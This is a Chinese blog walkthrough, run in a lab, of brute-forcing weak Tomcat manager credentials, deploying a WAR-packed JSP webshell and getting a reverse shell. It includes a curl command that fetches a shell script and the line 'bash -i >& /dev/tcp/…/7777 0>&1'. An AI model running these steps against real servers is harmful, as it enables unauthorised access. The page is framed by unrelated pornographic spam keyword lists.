日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術(shù)文章
文章詳情頁

Tomcat弱口令復(fù)現(xiàn)及利用(反彈shell)

瀏覽:388日期:2023-03-19 16:52:04
目錄
  • 漏洞描述
  • 復(fù)現(xiàn)
    • 環(huán)境
    • 攻擊流程
  • 利用
    • msf利用
    • 反彈shell利用
  • 參考文章

    漏洞描述

    Tomcat有一個管理后臺,其用戶名和密碼在Tomcat安裝目錄下的conf\tomcat-users.xml文件中配置,不少管理員為了方便,經(jīng)常采用弱口令。Tomcat 支持在后臺部署 war 文件,可以直接將 webshell 部署到 web 目錄下。其中,欲訪問后臺,需要對應(yīng)用戶有相應(yīng)權(quán)限。
    Tomcat7+ 權(quán)限分為:
    manager(后臺管理)

    manager-gui 擁有html頁面權(quán)限
    manager-status 擁有查看status的權(quán)限
    manager-script 擁有text接口的權(quán)限,和status權(quán)限
    manager-jmx 擁有jmx權(quán)限,和status權(quán)限
    host-manager(虛擬主機管理)

    admin-gui 擁有html頁面權(quán)限
    admin-script 擁有text接口權(quán)限
    二、漏洞影響
    Tomcat <= 6.0.0 默認用戶名為admin,密碼為空,無暴力破解限制。
    Tomcat >= 6.0.0 無默認用戶,五次失敗后,賬戶即被鎖定。
    但是正常安裝的情況下,tomcat8 中默認沒有任何用戶,且 Manager 頁面只允許本地 IP 訪問。只有管理員手工修改了這些屬性的情況下,才可以進行攻擊。

    復(fù)現(xiàn)

    環(huán)境

    一臺攻擊機(kali-2021)192.168.141.190
    受害機(vulhub搭建的)192.168.141.194
    一臺用來下載反彈shell腳本的服務(wù)器(內(nèi)網(wǎng),如果有服務(wù)器更好)192.168.141.128(利用時讓受害主機下載shell文件實現(xiàn)反彈shell)

    攻擊流程

    按照前人經(jīng)驗可以使用burpsuite進行爆破或者使用msf進行爆破
    首先是根據(jù)burpsuite進行爆破:
    抓取請求數(shù)據(jù)包可以看到

    =其中沒有看到熟悉的賬號密碼,但是其中’Authorization: Basic dG9tY2F0OnRvbWNhdA=='將其中的base64字符串解密可以看到結(jié)果格式為"tomcat:tomcat"所以將請求包送至爆破模塊,構(gòu)造格式為x:x的payload

    結(jié)果中的200即為成功,但是前面說明了tomcat8或有防爆破機制,當一個用戶名登錄超過五次就會鎖定賬戶,網(wǎng)上有說要用"tomcat暴破圖形化—繞過tomcat 6/7/8的防暴破機制"這個腳本來繞過但是作者沒有找到免費的,就不測試了.
    其次使用過msf進行爆破

    msf中找到上面的模塊配置出options的rhosts和rport就可以進行爆破(run)了

    可以看到用戶名和密碼在都是tomcat的時候爆破成功,而且可以看到msf應(yīng)該是自帶了繞過防爆破腳本,而且可以通過自定義user和password文件進行測試,所以作者更推薦使用msf爆破方式

    利用

    msf利用

    這里強調(diào)一下,在作者復(fù)現(xiàn)網(wǎng)上說的使用exploit/multi/http/tomcat_mgr_deploy但是在配置好rhoss和rport進行run的時候出現(xiàn)無法拿到shell問題

    所以作者使用了exploit/multi/http/tomcat_mgr_upload進行利用配置同deploy,配置httpusername,httppassword,rhosts.rport 然后運行拿到shell

    反彈shell利用

    整體思路:首先在網(wǎng)頁端登錄進管理后臺上傳jsp后門文件,然后訪問這個jsp后門即可,雖然上傳之后就可以通過shell軟件控制,但是為了復(fù)習(xí)反彈shell的過程,作者將進一步通過上傳的jsp一句話木馬(也可以上傳大馬)進行反彈shell.

    首先將一句話shelloneword.jsp(一句話木馬文件)通過命令,jar cvf shelloneword.war shelloneword.jsp 執(zhí)行成功后在管理后臺找到如下然后上傳

    成功之后可以在這看到結(jié)果

    之后通過各種軟件訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i= xxxx就行了

    但是作者的方式是通過讓受害主機訪問服務(wù)器主機下載shell文件,進行反彈shell,所以前面只是中間過程,首先讓受害主機執(zhí)行i=curl -o /shell.sh http://192.168.141.128/shell.txt 其中shell.txt文件內(nèi)容為

    bash -i >& /dev/tcp/192.168.141.190/7777 0>&1

    將ip和端口改為自己的,然后打開nc 監(jiān)聽7777端口,訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i=bash /shell.sh

    反彈shell成功

    參考文章

    [1] https://blog.csdn.net/qq_33020901/article/details/98357659
    [2] https://blog.csdn.net/weixin_44037296/article/details/116376114
    [3] https://blog.csdn.net/qq_43665434/article/details/116903953
    [4] https://www.cnblogs.com/henry666/p/14379888.html
    [5]https://www.cnblogs.com/qianxinggz/p/13440366.html
    [6]https://blog.csdn.net/weixin_42432317/article/details/90208213

    到此這篇關(guān)于Tomcat弱口令復(fù)現(xiàn)及利用(反彈shell)的文章就介紹到這了,更多相關(guān)Tomcat弱口令復(fù)現(xiàn)內(nèi)容請搜索以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持!

    標簽: Tomcat
    日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
    日韩福利一区| 亚洲一二av| 99久久精品国产亚洲精品| 中文无码日韩欧| 日韩久久精品网| 在线观看亚洲精品福利片| jizzjizz中国精品麻豆| 亚洲专区视频| 99日韩精品| 久久免费高清| 久久久亚洲欧洲日产| 亚洲精品三级| 99pao成人国产永久免费视频 | 国产欧美高清| 99国产精品视频免费观看一公开| 国产精品激情| 国产伦理一区| 国产日韩免费| 九一成人免费视频| 欧美aa在线视频| 久久久久久久久丰满| 亚洲精品看片| 欧美在线不卡| 亚洲91久久| 亚洲深夜av| 亚洲精品网址| | 亚洲免费影视| 国产一区导航| 偷拍欧美精品| 亚洲欧洲免费| 欧美aⅴ一区二区三区视频| 免费看一区二区三区| 91欧美日韩| 中文日韩在线| 国产探花在线精品| 欧美久久天堂| 免播放器亚洲一区| 精品视频黄色| 亚洲精品1区2区| 国产日韩一区二区三区在线| 久久精品国产一区二区| 亚洲少妇诱惑| 亚洲小说欧美另类婷婷| 国产日本亚洲| 亚洲国内精品| 三级一区在线视频先锋| 日韩高清不卡在线| 国产成人久久精品麻豆二区 | 久久久人人人| 久久精品播放| 国产一级久久| 国产精品香蕉| 国产视频一区欧美| 欧美 日韩 国产一区二区在线视频 | 欧美日韩亚洲一区| 日韩精品中文字幕第1页| 手机精品视频在线观看| 你懂的亚洲视频| 久久国产精品毛片| 国产一区二区精品福利地址| 日韩中文字幕麻豆| 久久毛片亚洲| 日韩不卡免费视频| 亚洲综合在线电影| 日韩三级精品| 综合国产精品| 日韩av网站免费在线| 日韩成人精品一区二区三区 | 色婷婷色综合| 98精品视频| 日韩天堂在线| 欧美高清一区| 蜜桃av一区| 日韩成人午夜精品| 日韩1区2区日韩1区2区| 日韩精彩视频在线观看| 欧美日韩伊人| 国产精品99一区二区三| 日韩欧美综合| 欧美日韩视频一区二区三区| 亚洲制服少妇| 国产日韩亚洲欧美精品| 久久亚洲道色| 日本精品在线中文字幕| 亚洲黄页一区| 日韩欧美中文字幕在线视频| www.com.cn成人| 福利一区视频| 蜜桃精品视频| 在线观看免费一区二区| 国产亚洲人成a在线v网站| 99国内精品| 国产在线日韩| 日韩欧美一区二区三区在线视频 | 国产在线一区不卡| 日本不卡一区二区三区| 日韩专区精品| 国产乱子精品一区二区在线观看| 日韩国产欧美| 久久99偷拍| 亚洲专区视频| 日韩午夜av| 久久亚洲国产精品尤物| 日韩一区二区三区精品视频第3页| 色欧美自拍视频| 国产精品99久久免费| 7777精品| 91久久中文| 99亚洲视频| 国产精品毛片在线| 婷婷视频一区二区三区| 日韩专区一卡二卡| 亚洲欧美日韩视频二区| 美腿丝袜在线亚洲一区| 久久国产精品毛片| 蜜桃精品在线| 波多视频一区| 国产精品va| 国产精品久久国产愉拍| 日本精品一区二区三区在线观看视频| 久久精品观看| 亚洲国产福利| 另类专区亚洲| 亚洲免费激情| 模特精品在线| 麻豆精品在线视频| 日韩免费在线| 亚洲一二三区视频| 日本午夜精品久久久| 日韩综合小视频| 国产欧美日韩精品一区二区三区| 日韩精品免费观看视频| 亚洲激情中文在线| 国产免费成人| 亚洲美女91| 国产精品红桃| 日韩中文在线播放| 日韩在线观看中文字幕| 国产一区 二区| 国产午夜久久av| 91精品国产乱码久久久久久久| 亚洲欧美日韩国产一区二区| 国产精品欧美日韩一区| 日韩精品免费一区二区三区| 亚洲精品在线观看91| 日韩视频一区二区三区在线播放免费观看| 一区二区三区午夜视频| 国产欧美日韩精品一区二区三区| se01亚洲视频 | 午夜精品成人av| 日本特黄久久久高潮| 久久久国产亚洲精品| 日韩大片在线观看| 不卡中文一二三区| 国际精品欧美精品| 日韩精品免费一区二区三区| 美女日韩在线中文字幕| 成人片免费看| 欧美一级久久| 欧美成人综合| 91精品国产自产精品男人的天堂 | 麻豆精品新av中文字幕| 亚洲91久久| 国产伦乱精品| 欧美日韩在线网站| 91嫩草亚洲精品| 亚洲精品福利| 日韩深夜视频| 在线一区视频| 日韩亚洲在线| 天海翼精品一区二区三区| 亚洲免费婷婷| 极品日韩av| 日韩成人精品一区二区三区| 日本vs亚洲vs韩国一区三区二区| 欧美精品97| 成人羞羞在线观看网站| 亚洲免费观看高清完整版在线观| 国产精品美女在线观看直播| 久久国产66| 视频在线观看一区| 鲁大师影院一区二区三区| 免费毛片在线不卡| 日韩三区免费| 一区久久精品| 在线精品福利| 婷婷成人av| 日韩理论视频| 亚洲影院天堂中文av色| 另类小说一区二区三区| 米奇777超碰欧美日韩亚洲| 日韩高清在线一区| 国产日韩欧美一区二区三区在线观看| 日本v片在线高清不卡在线观看| 国产传媒av在线| 精品国内亚洲2022精品成人| 四季av一区二区凹凸精品| 国产日韩欧美高清免费| 免费亚洲婷婷|